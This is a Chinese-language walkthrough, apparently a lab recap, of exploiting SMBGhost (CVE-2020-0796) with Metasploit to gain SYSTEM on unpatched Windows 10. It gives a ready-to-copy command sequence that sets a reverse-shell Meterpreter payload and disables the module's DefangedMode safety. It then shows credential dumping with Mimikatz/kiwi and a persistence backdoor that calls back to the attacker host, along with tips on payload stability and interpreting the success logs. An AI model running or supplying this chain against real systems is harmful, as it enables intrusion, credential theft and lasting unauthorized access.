一、核心信息
-
漏洞名称:SMBGhost / CVE-2020-0796
-
目标系统:Windows 10 1903/1909 x64(10.0.18362.x,未打 KB4551762 补丁)
-
权限结果 :直接获取
NT AUTHORITY\SYSTEM最高权限 -
关键环境:Metasploit Framework,攻击机与目标网络互通(同一网段)
二、完整操作流程(可直接复制复用)
# 1. 启动Metasploit msfconsole -q # 2. 加载SMBGhost漏洞模块 use exploit/windows/smb/cve_2020_0796_smbghost # 3. 设置关键参数 set payload windows/x64/meterpreter/reverse_tcp # 稳定的Meterpreter反向Shell set RHOSTS 192.168.1.8 # 目标IP set LHOST 192.168.1.138 # 攻击机IP set DefangedMode false # 关闭安全保护模式,允许高危操作 # 4. 验证参数配置 show options # 5. 执行漏洞利用 run
三、关键日志解读(成功信号)
|-----------------------------------------------|------------------------------|
| 日志信息 | 说明 |
| Found low stub/PML4/HAL heap... | 漏洞利用的内核地址定位成功,漏洞触发流程正常 |
| KUSER_SHARED_DATA PTE NX bit cleared! | 绕过了系统的 NX 保护,payload 注入条件已满足 |
| Sending stage (232006 bytes) to 192.168.1.8 | Meterpreter payload 已成功发送到目标 |
| Meterpreter session 2 opened | 反向连接建立,Meterpreter 会话成功创建 |
| getuid → NT AUTHORITY\SYSTEM | 已获取 Windows 系统最高权限 |
四、关键避坑点(复盘必看)
-
DefangedMode必须关闭 模块默认开启该安全模式,会阻止高危操作,导致利用被强制终止,报错提示:Disable the DefangedMode option to proceed。 -
Payload 选择优化
-
优先使用
windows/x64/meterpreter/reverse_tcp,自带心跳保活,比普通shell/reverse_tcp更稳定,能避免模块后续恢复操作导致的会话误杀。 -
普通 shell 会话容易因 SMB 连接超时被关闭,Meterpreter 会话更耐断。
-
-
目标系统版本必须匹配 仅对 Windows 10 1903/1909 x64 有效,目标系统版本
10.0.18362符合条件,且未安装 KB4551762 补丁。 -
蓝屏风险预警 该漏洞是内核级漏洞,利用后系统内核已被修改,目标大概率会在几分钟到几小时内蓝屏重启,会话无法长期保持,关键操作需一次性完成。
五、成功后可执行的核心操作(复盘拓展)
# 1. 基础信息收集 sysinfo # 查看目标系统信息 getuid # 验证当前权限(SYSTEM) ps # 查看进程列表 netstat -ano # 查看网络连接 # 2. 密码Hash抓取(SYSTEM权限下) load kiwi # 加载Mimikatz模块 creds_all # 导出本地用户密码/Hash # 3. 持久化后门(可选,注意环境限制) run persistence -U -i 5 -p 443 -r 192.168.1.138 # 开机自启后门
六、复盘总结
本次利用成功的核心是:正确关闭了安全模式 + 选择了稳定的 Meterpreter payload + 目标系统版本匹配,最终实现了从漏洞触发到 SYSTEM 权限获取的完整流程。后续复现可直接套用上述命令,同时重点关注日志中的关键成功信号,快速判断利用状态。